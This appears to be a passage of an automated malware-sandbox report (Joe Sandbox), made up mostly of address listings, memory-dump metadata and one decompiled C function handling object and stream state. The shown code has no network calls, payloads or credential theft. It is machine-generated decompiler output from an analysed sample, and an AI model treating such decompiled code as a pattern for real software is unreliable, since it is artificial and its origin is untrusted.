                                                                                                                    0x00b574ee
                                                                                                                    0x00b574f3
                                                                                                                    0x00b574f3
                                                                                                                    0x00b574f6
                                                                                                                    0x00b574f9
                                                                                                                    0x00b574fd
                                                                                                                    0x00b574ff
                                                                                                                    0x00b57504
                                                                                                                    0x00b57504
                                                                                                                    0x00b57507
                                                                                                                    0x00000000
                                                                                                                    0x00b57507
                                                                                                                    0x00b5746b
                                                                                                                    0x00b5737e
                                                                                                                    0x00b57381
                                                                                                                    0x00b57385
                                                                                                                    0x00b57387
                                                                                                                    0x00b5738c
                                                                                                                    0x00b5738c
                                                                                                                    0x00b5738f
                                                                                                                    0x00b57392
                                                                                                                    0x00b57396
                                                                                                                    0x00b57398
                                                                                                                    0x00b5739d
                                                                                                                    0x00b5739d
                                                                                                                    0x00b573a6
                                                                                                                    0x00b573aa
                                                                                                                    0x00b573af
                                                                                                                    0x00b573b2
                                                                                                                    0x00b573b6
                                                                                                                    0x00b573b8
                                                                                                                    0x00b573bd
                                                                                                                    0x00b573bd
                                                                                                                    0x00b573c0
                                                                                                                    0x00b573c3
                                                                                                                    0x00b573c7
                                                                                                                    0x00b573c9
                                                                                                                    0x00b573ce
                                                                                                                    0x00b573ce
                                                                                                                    0x00b573d1
                                                                                                                    0x00000000
                                                                                                                    0x00b573d1
                                                                                                                    0x00b57311
                                                                                                                    0x00b57314
                                                                                                                    0x00b57318
                                                                                                                    0x00b5731a
                                                                                                                    0x00b5731f
                                                                                                                    0x00b5731f
                                                                                                                    0x00b57322
                                                                                                                    0x00b57325
                                                                                                                    0x00b57329
                                                                                                                    0x00b5732b
                                                                                                                    0x00b57330
                                                                                                                    0x00b57330
                                                                                                                    0x00b57339
                                                                                                                    0x00b5733d
                                                                                                                    0x00b57342
                                                                                                                    0x00b57345
                                                                                                                    0x00b57349
                                                                                                                    0x00b5734b
                                                                                                                    0x00b57350
                                                                                                                    0x00b57350
                                                                                                                    0x00b57353
                                                                                                                    0x00b57356
                                                                                                                    0x00b5735a
                                                                                                                    0x00b5735c
                                                                                                                    0x00b57361
                                                                                                                    0x00b57361
                                                                                                                    0x00b57364
                                                                                                                    0x00000000
                                                                                                                    0x00b57250
                                                                                                                    0x00b57250
                                                                                                                    0x00b57256
                                                                                                                    0x00b5725c
                                                                                                                    0x00b57269
                                                                                                                    0x00b57270
                                                                                                                    0x00b5727a
                                                                                                                    0x00b5727d
                                                                                                                    0x00b5727d
                                                                                                                    0x00b5727e
                                                                                                                    0x00b57281
                                                                                                                    0x00b57284
                                                                                                                    0x00b57287
                                                                                                                    0x00b5728a
                                                                                                                    0x00b5728a
                                                                                                                    0x00b5728b
                                                                                                                    0x00b5728e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b57290
                                                                                                                    0x00b57294
                                                                                                                    0x00b5729d
                                                                                                                    0x00b57296
                                                                                                                    0x00b57296
                                                                                                                    0x00b57296
                                                                                                                    0x00b572a0
                                                                                                                    0x00b572a6
                                                                                                                    0x00b572a9
                                                                                                                    0x00000000
                                                                                                                    0x00b572ab
                                                                                                                    0x00b572ab
                                                                                                                    0x00b572ae
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b572b1
                                                                                                                    0x00000000
                                                                                                                    0x00b572b1
                                                                                                                    0x00b572a9
                                                                                                                    0x00b572b6
                                                                                                                    0x00b572b6
                                                                                                                    0x00b572b9
                                                                                                                    0x00b572bc
                                                                                                                    0x00b572bf
                                                                                                                    0x00b572c2
                                                                                                                    0x00b572c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b572d8
                                                                                                                    0x00b572db
                                                                                                                    0x00b572de
                                                                                                                    0x00b572de
                                                                                                                    0x00000000
                                                                                                                    0x00b572bf
                                                                                                                    0x00b5724a
                                                                                                                    0x00b571c2
                                                                                                                    0x00b571c5
                                                                                                                    0x00b571c9
                                                                                                                    0x00b571cb
                                                                                                                    0x00b571d0
                                                                                                                    0x00b571d0
                                                                                                                    0x00b571d3
                                                                                                                    0x00b571d6
                                                                                                                    0x00b571da
                                                                                                                    0x00b571dc
                                                                                                                    0x00b571e1
                                                                                                                    0x00b571e1
                                                                                                                    0x00b571ea
                                                                                                                    0x00b571ee
                                                                                                                    0x00b571f3
                                                                                                                    0x00b571f6
                                                                                                                    0x00b571fa
                                                                                                                    0x00b571fc
                                                                                                                    0x00b57201
                                                                                                                    0x00b57201
                                                                                                                    0x00b57204
                                                                                                                    0x00b57207
                                                                                                                    0x00b5720b
                                                                                                                    0x00b5720d
                                                                                                                    0x00b57212
                                                                                                                    0x00b57212
                                                                                                                    0x00000000
                                                                                                                    0x00b5720d
                                                                                                                    0x00b5716a
                                                                                                                    0x00b5716d
                                                                                                                    0x00b57171
                                                                                                                    0x00b57173
                                                                                                                    0x00b57178
                                                                                                                    0x00b57178
                                                                                                                    0x00b5717b
                                                                                                                    0x00b5717e
                                                                                                                    0x00b57182
                                                                                                                    0x00b57184
                                                                                                                    0x00b57189
                                                                                                                    0x00b57189
                                                                                                                    0x00b57192
                                                                                                                    0x00b57196
                                                                                                                    0x00b5719b
                                                                                                                    0x00b5719e
                                                                                                                    0x00b571a2
                                                                                                                    0x00b571a4
                                                                                                                    0x00b571a9
                                                                                                                    0x00b571a9
                                                                                                                    0x00b571ac
                                                                                                                    0x00b571af
                                                                                                                    0x00b571b3
                                                                                                                    0x00000000
                                                                                                                    0x00b571b3
                                                                                                                    0x00b57071
                                                                                                                    0x00b57075
                                                                                                                    0x00b57077
                                                                                                                    0x00b57080
                                                                                                                    0x00b57080
                                                                                                                    0x00000000
                                                                                                                    0x00b56fdd
                                                                                                                    0x00b56fdd
                                                                                                                    0x00b56fe2
                                                                                                                    0x00b56feb
                                                                                                                    0x00b56feb
                                                                                                                    0x00b57215
                                                                                                                    0x00b57215
                                                                                                                    0x00b5777c
                                                                                                                    0x00b57781
                                                                                                                    0x00b5778a
                                                                                                                    0x00b5778a

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4dd65f8602febd93b430678c0c7002e2d3b016e26865edd5771d0e90d6b52996
                                                                                                                    • Instruction ID: 7b9413330fdc490f264ad8f53898429a2030929b4ca92fa27b547bc0f10cd8ca
                                                                                                                    • Opcode Fuzzy Hash: 4dd65f8602febd93b430678c0c7002e2d3b016e26865edd5771d0e90d6b52996
                                                                                                                    • Instruction Fuzzy Hash: 65527E70A04249DFDF11CFA8D588BADBBF5EF49305F2840D9E805AB281DB759E49CB21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B24FFE Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00B24FFE() {
				void* __edi;
				intOrPtr* _t168;
				intOrPtr* _t169;
				intOrPtr* _t171;
				char* _t173;
				signed int _t176;
				signed int _t178;
				signed int _t181;
				signed int _t185;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				signed int _t198;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t262;
				signed int _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;
				intOrPtr* _t277;
				signed int _t279;
				intOrPtr _t280;
				signed int _t281;
				intOrPtr* _t282;
				signed int _t284;
				signed int _t286;
				void* _t287;
				void* _t289;

				L00B7F140(0xb83c94, _t287);
				_t284 =  *(_t287 + 8);
				 *( *(_t287 + 0x10)) = 0;
				 *((intOrPtr*)(_t287 - 0x10)) = _t289 - 0x18;
				 *((intOrPtr*)(_t287 - 4)) = 0;
				if( *(_t284 + 0x134) != 0) {
					L00B254B1( *((intOrPtr*)(_t284 + 0x130)));
				}
				_t275 = _t284 + 0x11c;
				 *((char*)(_t284 + 0x138)) = 0;
				_t168 =  *_t275;
				if(_t168 != 0) {
					 *((intOrPtr*)( *_t168 + 8))(_t168);
					 *_t275 = 0;
				}
				_t169 =  *((intOrPtr*)(_t284 + 0x12c));
				_t276 = _t284 + 0x12c;
				if(_t169 != 0) {
					 *((intOrPtr*)( *_t169 + 8))(_t169);
					 *_t276 = 0;
				}
				 *((intOrPtr*)(_t284 + 0xd0)) = 0;
				 *((intOrPtr*)(_t284 + 0x104)) =  *((intOrPtr*)(_t287 + 0xc));
				_t171 = _t284 + 0xc0;
				 *((intOrPtr*)(_t284 + 0x108)) = 0;
				 *((intOrPtr*)(_t284 + 0x110)) = 0;
				 *((char*)(_t284 + 0x36)) = 0;
				 *((intOrPtr*)(_t284 + 0xd4)) = 0;
				 *((char*)(_t284 + 0x30)) = 0;
				 *((intOrPtr*)(_t284 + 0x10c)) = 0;
				 *((char*)(_t284 + 0x3b)) = 0;
				 *((char*)(_t284 + 0x3c)) = 0;
				 *((intOrPtr*)(_t284 + 0x114)) = 0;
				 *((intOrPtr*)(_t171 + 4)) = 0;
				 *((short*)( *_t171)) = 0;
				_t173 = _t284 + 0x1d4;
				 *((char*)(_t284 + 0x1f0)) = 0;
				 *((char*)(_t284 + 0x37)) = 0;
				 *((char*)(_t284 + 0x38)) = 0;
				 *((char*)(_t284 + 0x39)) = 0;
				 *((char*)(_t284 + 0x3a)) = 0;
				 *_t173 = 0;
				 *((char*)(_t173 + 1)) = 0;
				 *((char*)(_t173 + 2)) = 0;
				 *((char*)(_t173 + 3)) = 0;
				 *((intOrPtr*)(_t173 + 8)) = 0;
				 *((short*)( *((intOrPtr*)(_t173 + 4)))) = 0;
				 *((char*)(_t284 + 0x31)) = 0;
				if( *(_t287 + 0x14) == 0 &&  *(_t284 + 0x3f) == 0) {
					 *((char*)(_t284 + 0x31)) = 1;
				}
				_t277 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x1c))));
				_t176 = L00B24FB2(_t284,  *((intOrPtr*)(_t287 + 0xc)));
				if(_t176 != 0) {
					L98:
					 *[fs:0x0] =  *((intOrPtr*)(_t287 - 0xc));
					return _t176;
				} else {
					 *(_t287 - 0x24) = 0;
					 *((short*)(_t287 - 0x22)) = 0;
					 *((intOrPtr*)(_t287 - 0x1c)) = 0;
					 *((char*)(_t287 - 4)) = 1;
					_t178 =  *((intOrPtr*)( *_t277 + 0x18))(_t277,  *((intOrPtr*)(_t287 + 0xc)), 0x1d, _t287 - 0x24);
					if(_t178 == 0) {
						__eflags =  *(_t287 - 0x24);
						if( *(_t287 - 0x24) == 0) {
							L17:
							 *((char*)(_t287 - 4)) = 0;
							L00B19312(_t287 - 0x24);
							_t176 = L00B23E1F(_t284);
							__eflags = _t176;
							if(_t176 != 0) {
								goto L98;
							}
							_t176 = L00B378D7(_t277,  *((intOrPtr*)(_t287 + 0xc)), 0xf, _t284 + 0x36);
							__eflags = _t176;
							if(_t176 != 0) {
								goto L98;
							}
							_t176 = L00B23A71(_t284);
							__eflags = _t176;
							if(_t176 != 0) {
								goto L98;
							}
							__eflags =  *(_t284 + 0x28);
							if( *(_t284 + 0x28) != 0) {
								L22:
								_t236 =  *(_t284 + 0x4c);
								_t279 = _t284 + 0x8c;
								__eflags =  *(_t284 + 0x4c);
								if(__eflags == 0) {
									L24:
									__eflags =  *(_t284 + 0x139);
									if( *(_t284 + 0x139) == 0) {
										_t237 =  *(_t279 + 4);
										__eflags = _t237;
										if(_t237 != 0) {
											L35:
											_t181 =  *(_t284 + 0x44);
											 *(_t287 - 0x14) = 0;
											__eflags = _t181;
											if(_t181 < 0) {
												L59:
												_push( *(_t287 - 0x14));
												_t238 = _t284 + 0x8c;
												L60:
												E00B26595(_t238, _t279);
												L61:
												__eflags =  *(_t284 + 0x74);
												if( *(_t284 + 0x74) == 0) {
													 *(_t287 + 8) = 0;
													__eflags =  *(_t287 + 0x14);
													 *((char*)(_t287 - 4)) = 3;
													if( *(_t287 + 0x14) != 0) {
														L82:
														__eflags =  *(_t284 + 0x134);
														if( *(_t284 + 0x134) == 0) {
															L86:
															_t239 =  *(_t287 + 8);
															__eflags = _t239;
															if(_t239 != 0) {
																_t185 = _t239;
																_t239 = 0;
																__eflags = 0;
																 *(_t287 + 8) = 0;
																 *( *(_t287 + 0x10)) = _t185;
															}
															__eflags = _t239;
															 *((char*)(_t287 - 4)) = 0;
															if(_t239 != 0) {
																 *((intOrPtr*)( *_t239 + 8))(_t239);
															}
															L90:
															_t176 = 0;
															goto L98;
														}
														__eflags =  *(_t287 + 0x14);
														if( *(_t287 + 0x14) == 0) {
															L85:
															E00B1A98B( *((intOrPtr*)(_t284 + 0x130)) + 8,  *(_t287 + 8));
															E00B1A98B(_t287 + 8,  *(_t284 + 0x134));
															_t280 =  *((intOrPtr*)(_t284 + 0x130));
															 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x1c))))))();
															 *((intOrPtr*)(_t280 + 0x10)) = 0;
															 *((intOrPtr*)(_t280 + 0x14)) = 0;
															 *((char*)(_t280 + 0x18)) = 1;
															 *((char*)(_t284 + 0x138)) = 1;
															goto L86;
														}
														__eflags =  *(_t287 + 0x14) - 1;
														if( *(_t287 + 0x14) != 1) {
															goto L86;
														}
														goto L85;
													}
													__eflags =  *(_t284 + 0x3f);
													if( *(_t284 + 0x3f) != 0) {
														goto L82;
													}
													__eflags =  *(_t284 + 0x3e);
													if( *(_t284 + 0x3e) == 0) {
														 *(_t287 + 0xf) = 1;
														_t193 = E00B248E3(_t284, _t287 + 8, _t287 + 0xf); // executed
														_t281 = _t193;
														__eflags = _t281;
														if(_t281 == 0) {
															__eflags =  *(_t287 + 0xf);
															if( *(_t287 + 0xf) == 0) {
																goto L82;
															}
															_t194 =  *(_t287 + 8);
															 *((char*)(_t287 - 4)) = 0;
															__eflags = _t194;
															if(_t194 != 0) {
																 *((intOrPtr*)( *_t194 + 8))(_t194);
															}
															goto L90;
														}
														_t196 =  *(_t287 + 8);
														 *((char*)(_t287 - 4)) = 0;
														__eflags = _t196;
														if(_t196 != 0) {
															 *((intOrPtr*)( *_t196 + 8))(_t196);
														}
														_t176 = _t281;
														goto L98;
													}
													_push(0x10);
													_t198 = E00B11E55();
													__eflags = _t198;
													if(_t198 == 0) {
														_t198 = 0;
														__eflags = 0;
													} else {
														 *((intOrPtr*)(_t198 + 4)) = 0;
														 *((intOrPtr*)(_t198 + 8)) = 0;
														 *((intOrPtr*)(_t198 + 0xc)) = 0;
														 *_t198 = 0xb8a6cc;
													}
													E00B1A98B(_t287 + 8, _t198);
													goto L82;
												}
												__eflags =  *(_t284 + 0x7c);
												_t282 = _t284 + 0x7c;
												if(__eflags == 0) {
													_push(0x10);
													_t209 = E00B11E55();
													__eflags = _t209;
													if(_t209 == 0) {
														_t209 = 0;
														__eflags = 0;
													} else {
														 *((intOrPtr*)(_t209 + 4)) = 0;
														 *_t209 = 0xb8a6dc;
													}
													 *(_t284 + 0x78) = _t209;
													E00B1A98B(_t282, _t209);
												}
												 *((intOrPtr*)( *(_t284 + 0x78) + 0xc)) =  *((intOrPtr*)(_t284 + 0x1c));
												 *((intOrPtr*)( *(_t284 + 0x78) + 8)) =  *((intOrPtr*)(_t287 + 0xc));
												E00B324E9(_t287 - 0x20, _t284 + 0x8c, __eflags);
												__eflags =  *(_t284 + 0xb0);
												 *((char*)(_t287 - 4)) = 2;
												if( *(_t284 + 0xb0) == 0) {
													L73:
													_t203 =  *(_t284 + 0x74);
													__eflags =  *(_t284 + 0xb2);
													_t122 =  *(_t284 + 0xb2) != 0;
													__eflags = _t122;
													_t286 =  *((intOrPtr*)( *_t203 + 0x10))(_t203,  *((intOrPtr*)(_t287 - 0x20)), 0 | _t122,  *(_t287 + 0x10),  *(_t287 + 0x14),  *_t282);
													E00B11E89(_t204,  *((intOrPtr*)(_t287 - 0x20)));
													L74:
													_t176 = _t286;
													goto L98;
												} else {
													__eflags =  *(_t284 + 0x90);
													if( *(_t284 + 0x90) != 0) {
														L71:
														L00B11089(_t287 - 0x20, 0x3a);
														L72:
														L00B13171(_t287 - 0x20, __eflags, _t284 + 0xa4);
														goto L73;
													}
													__eflags =  *(_t284 + 0x3d);
													if(__eflags != 0) {
														goto L72;
													}
													__eflags =  *(_t284 + 0x44) - 4;
													if(__eflags == 0) {
														goto L72;
													}
													goto L71;
												}
											}
											__eflags = _t181 - 1;
											if(_t181 <= 1) {
												_t211 =  *(_t284 + 0x144);
												__eflags = _t211;
												if(_t211 == 0) {
													goto L59;
												}
												__eflags = _t237 - _t211;
												if(__eflags < 0) {
													L55:
													__eflags =  *(_t287 + 0x14);
													if( *(_t287 + 0x14) != 0) {
														goto L59;
													}
													__eflags =  *(_t284 + 0x3f);
													if( *(_t284 + 0x3f) != 0) {
														goto L59;
													}
													_t176 = 0x80004005;
													goto L98;
												}
												if(__eflags != 0) {
													L50:
													_t279 = 0;
													__eflags = 0;
													while(1) {
														__eflags = _t279 -  *(_t284 + 0x144);
														if(_t279 >=  *(_t284 + 0x144)) {
															break;
														}
														_t217 = E00B142B1( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x140)) + _t279 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *(_t284 + 0x8c) + _t279 * 4)))));
														__eflags = _t217;
														if(_t217 != 0) {
															goto L55;
														}
														_t279 = _t279 + 1;
													}
													__eflags = 0;
													if(0 == 0) {
														 *(_t287 - 0x14) =  *(_t284 + 0x144);
														goto L59;
													}
													goto L55;
												}
												__eflags =  *(_t284 + 0x3d);
												if( *(_t284 + 0x3d) == 0) {
													__eflags =  *(_t284 + 0xb3);
													if( *(_t284 + 0xb3) == 0) {
														goto L55;
													}
													goto L50;
												}
												__eflags =  *(_t284 + 0xb0);
												if( *(_t284 + 0xb0) != 0) {
													goto L50;
												}
												goto L55;
											}
											__eflags = _t181 - 2;
											if(_t181 == 2) {
												L41:
												__eflags = _t237;
												if(_t237 == 0) {
													goto L59;
												}
												_t237 = _t237 - 1;
												L40:
												 *(_t287 - 0x14) = _t237;
												goto L59;
											}
											__eflags = _t181 - 4;
											if(_t181 != 4) {
												goto L59;
											}
											__eflags =  *(_t284 + 0xb0);
											if( *(_t284 + 0xb0) == 0) {
												goto L41;
											}
											goto L40;
										}
										__eflags =  *(_t284 + 0xb2);
										if( *(_t284 + 0xb2) != 0) {
											goto L90;
										}
										goto L35;
									}
									_t272 =  *(_t279 + 4);
									__eflags = _t272;
									if(_t272 == 0) {
										goto L61;
									}
									_t218 =  *(_t284 + 0x44);
									_t262 = 0;
									__eflags = _t218 - 4;
									if(_t218 != 4) {
										L29:
										__eflags = _t218 - 2;
										if(_t218 == 2) {
											L31:
											_t262 = _t272 - 1;
											L32:
											_push(_t262);
											_t238 = _t279;
											goto L60;
										}
										__eflags = _t218 - 4;
										if(_t218 != 4) {
											goto L32;
										}
										goto L31;
									}
									__eflags =  *(_t284 + 0xb0);
									if( *(_t284 + 0xb0) == 0) {
										goto L29;
									}
									_t262 = _t272;
									goto L32;
								}
								_t219 = L00B23E09(_t236, __eflags);
								__eflags = _t219;
								if(_t219 == 0) {
									goto L90;
								}
								goto L24;
							}
							__eflags =  *(_t284 + 0xb0);
							if( *(_t284 + 0xb0) != 0) {
								goto L90;
							}
							goto L22;
						}
						__eflags =  *(_t287 - 0x24) - 0x15;
						if( *(_t287 - 0x24) == 0x15) {
							 *((char*)(_t284 + 0x30)) = 1;
							 *((intOrPtr*)(_t284 + 0xd0)) =  *((intOrPtr*)(_t287 - 0x1c));
							 *((intOrPtr*)(_t284 + 0xd4)) =  *((intOrPtr*)(_t287 - 0x18));
							goto L17;
						}
						_t286 = 0x80004005;
						L15:
						L00B19312(_t287 - 0x24);
						goto L74;
					}
					_t286 = _t178;
					goto L15;
				}
			}






































                                                                                                                    0x00b25003
                                                                                                                    0x00b25010
                                                                                                                    0x00b25016
                                                                                                                    0x00b2501e
                                                                                                                    0x00b25021
                                                                                                                    0x00b25024
                                                                                                                    0x00b2502c
                                                                                                                    0x00b2502c
                                                                                                                    0x00b25031
                                                                                                                    0x00b25037
                                                                                                                    0x00b2503d
                                                                                                                    0x00b25041
                                                                                                                    0x00b25046
                                                                                                                    0x00b25049
                                                                                                                    0x00b25049
                                                                                                                    0x00b2504b
                                                                                                                    0x00b25051
                                                                                                                    0x00b25059
                                                                                                                    0x00b2505e
                                                                                                                    0x00b25061
                                                                                                                    0x00b25061
                                                                                                                    0x00b25066
                                                                                                                    0x00b2506c
                                                                                                                    0x00b25072
                                                                                                                    0x00b25078
                                                                                                                    0x00b2507e
                                                                                                                    0x00b25084
                                                                                                                    0x00b25087
                                                                                                                    0x00b2508d
                                                                                                                    0x00b25090
                                                                                                                    0x00b25096
                                                                                                                    0x00b25099
                                                                                                                    0x00b2509c
                                                                                                                    0x00b250a2
                                                                                                                    0x00b250aa
                                                                                                                    0x00b250ad
                                                                                                                    0x00b250b3
                                                                                                                    0x00b250b9
                                                                                                                    0x00b250bc
                                                                                                                    0x00b250bf
                                                                                                                    0x00b250c2
                                                                                                                    0x00b250c5
                                                                                                                    0x00b250c7
                                                                                                                    0x00b250ca
                                                                                                                    0x00b250cd
                                                                                                                    0x00b250d0
                                                                                                                    0x00b250d6
                                                                                                                    0x00b250d9
                                                                                                                    0x00b250dc
                                                                                                                    0x00b250e3
                                                                                                                    0x00b250e3
                                                                                                                    0x00b250ef
                                                                                                                    0x00b250f1
                                                                                                                    0x00b250f8
                                                                                                                    0x00b254a0
                                                                                                                    0x00b254a5
                                                                                                                    0x00b254ae
                                                                                                                    0x00b250fe
                                                                                                                    0x00b250fe
                                                                                                                    0x00b25102
                                                                                                                    0x00b25106
                                                                                                                    0x00b25114
                                                                                                                    0x00b25119
                                                                                                                    0x00b2511e
                                                                                                                    0x00b25124
                                                                                                                    0x00b25128
                                                                                                                    0x00b25159
                                                                                                                    0x00b2515c
                                                                                                                    0x00b2515f
                                                                                                                    0x00b25166
                                                                                                                    0x00b2516b
                                                                                                                    0x00b2516d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2517e
                                                                                                                    0x00b25183
                                                                                                                    0x00b25185
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2518d
                                                                                                                    0x00b25192
                                                                                                                    0x00b25194
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2519a
                                                                                                                    0x00b2519d
                                                                                                                    0x00b251ab
                                                                                                                    0x00b251ab
                                                                                                                    0x00b251ae
                                                                                                                    0x00b251b4
                                                                                                                    0x00b251b6
                                                                                                                    0x00b251cb
                                                                                                                    0x00b251cb
                                                                                                                    0x00b251d1
                                                                                                                    0x00b25209
                                                                                                                    0x00b2520c
                                                                                                                    0x00b2520e
                                                                                                                    0x00b2521c
                                                                                                                    0x00b2521c
                                                                                                                    0x00b2521f
                                                                                                                    0x00b25222
                                                                                                                    0x00b25224
                                                                                                                    0x00b252c9
                                                                                                                    0x00b252c9
                                                                                                                    0x00b252cc
                                                                                                                    0x00b252d2
                                                                                                                    0x00b252d2
                                                                                                                    0x00b252d7
                                                                                                                    0x00b252d7
                                                                                                                    0x00b252da
                                                                                                                    0x00b25397
                                                                                                                    0x00b2539a
                                                                                                                    0x00b2539d
                                                                                                                    0x00b253a1
                                                                                                                    0x00b253d9
                                                                                                                    0x00b253d9
                                                                                                                    0x00b253df
                                                                                                                    0x00b25429
                                                                                                                    0x00b25429
                                                                                                                    0x00b2542c
                                                                                                                    0x00b2542e
                                                                                                                    0x00b25433
                                                                                                                    0x00b25435
                                                                                                                    0x00b25435
                                                                                                                    0x00b25437
                                                                                                                    0x00b2543a
                                                                                                                    0x00b2543a
                                                                                                                    0x00b2543c
                                                                                                                    0x00b2543e
                                                                                                                    0x00b25441
                                                                                                                    0x00b25446
                                                                                                                    0x00b25446
                                                                                                                    0x00b25449
                                                                                                                    0x00b25449
                                                                                                                    0x00000000
                                                                                                                    0x00b25449
                                                                                                                    0x00b253e1
                                                                                                                    0x00b253e4
                                                                                                                    0x00b253ec
                                                                                                                    0x00b253f8
                                                                                                                    0x00b25406
                                                                                                                    0x00b2540b
                                                                                                                    0x00b25416
                                                                                                                    0x00b25418
                                                                                                                    0x00b2541b
                                                                                                                    0x00b2541e
                                                                                                                    0x00b25422
                                                                                                                    0x00000000
                                                                                                                    0x00b25422
                                                                                                                    0x00b253e6
                                                                                                                    0x00b253ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b253ea
                                                                                                                    0x00b253a3
                                                                                                                    0x00b253a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b253a8
                                                                                                                    0x00b253ab
                                                                                                                    0x00b25457
                                                                                                                    0x00b2545b
                                                                                                                    0x00b25460
                                                                                                                    0x00b25462
                                                                                                                    0x00b25464
                                                                                                                    0x00b2547a
                                                                                                                    0x00b2547d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25483
                                                                                                                    0x00b25486
                                                                                                                    0x00b25489
                                                                                                                    0x00b2548b
                                                                                                                    0x00b25490
                                                                                                                    0x00b25490
                                                                                                                    0x00000000
                                                                                                                    0x00b2548b
                                                                                                                    0x00b25466
                                                                                                                    0x00b25469
                                                                                                                    0x00b2546c
                                                                                                                    0x00b2546e
                                                                                                                    0x00b25473
                                                                                                                    0x00b25473
                                                                                                                    0x00b25476
                                                                                                                    0x00000000
                                                                                                                    0x00b25476
                                                                                                                    0x00b253b1
                                                                                                                    0x00b253b3
                                                                                                                    0x00b253b8
                                                                                                                    0x00b253bb
                                                                                                                    0x00b253ce
                                                                                                                    0x00b253ce
                                                                                                                    0x00b253bd
                                                                                                                    0x00b253bd
                                                                                                                    0x00b253c0
                                                                                                                    0x00b253c3
                                                                                                                    0x00b253c6
                                                                                                                    0x00b253c6
                                                                                                                    0x00b253d4
                                                                                                                    0x00000000
                                                                                                                    0x00b253d4
                                                                                                                    0x00b252e0
                                                                                                                    0x00b252e3
                                                                                                                    0x00b252e6
                                                                                                                    0x00b252e8
                                                                                                                    0x00b252ea
                                                                                                                    0x00b252ef
                                                                                                                    0x00b252f2
                                                                                                                    0x00b252ff
                                                                                                                    0x00b252ff
                                                                                                                    0x00b252f4
                                                                                                                    0x00b252f4
                                                                                                                    0x00b252f7
                                                                                                                    0x00b252f7
                                                                                                                    0x00b25304
                                                                                                                    0x00b25307
                                                                                                                    0x00b25307
                                                                                                                    0x00b25318
                                                                                                                    0x00b25321
                                                                                                                    0x00b25327
                                                                                                                    0x00b2532c
                                                                                                                    0x00b25332
                                                                                                                    0x00b25336
                                                                                                                    0x00b25364
                                                                                                                    0x00b25366
                                                                                                                    0x00b2536f
                                                                                                                    0x00b2537a
                                                                                                                    0x00b2537a
                                                                                                                    0x00b25388
                                                                                                                    0x00b2538a
                                                                                                                    0x00b25390
                                                                                                                    0x00b25390
                                                                                                                    0x00000000
                                                                                                                    0x00b25338
                                                                                                                    0x00b25338
                                                                                                                    0x00b2533e
                                                                                                                    0x00b2534b
                                                                                                                    0x00b25350
                                                                                                                    0x00b25355
                                                                                                                    0x00b2535f
                                                                                                                    0x00000000
                                                                                                                    0x00b2535f
                                                                                                                    0x00b25340
                                                                                                                    0x00b25343
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25345
                                                                                                                    0x00b25349
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25349
                                                                                                                    0x00b25336
                                                                                                                    0x00b2522a
                                                                                                                    0x00b2522d
                                                                                                                    0x00b25251
                                                                                                                    0x00b25257
                                                                                                                    0x00b25259
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2525b
                                                                                                                    0x00b2525d
                                                                                                                    0x00b252ac
                                                                                                                    0x00b252ac
                                                                                                                    0x00b252af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b252b1
                                                                                                                    0x00b252b4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b252b6
                                                                                                                    0x00000000
                                                                                                                    0x00b252b6
                                                                                                                    0x00b2525f
                                                                                                                    0x00b25278
                                                                                                                    0x00b25278
                                                                                                                    0x00b25278
                                                                                                                    0x00b2527a
                                                                                                                    0x00b2527a
                                                                                                                    0x00b25280
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2529a
                                                                                                                    0x00b2529f
                                                                                                                    0x00b252a1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b252a3
                                                                                                                    0x00b252a3
                                                                                                                    0x00b252a8
                                                                                                                    0x00b252aa
                                                                                                                    0x00b252c6
                                                                                                                    0x00000000
                                                                                                                    0x00b252c6
                                                                                                                    0x00000000
                                                                                                                    0x00b252aa
                                                                                                                    0x00b25261
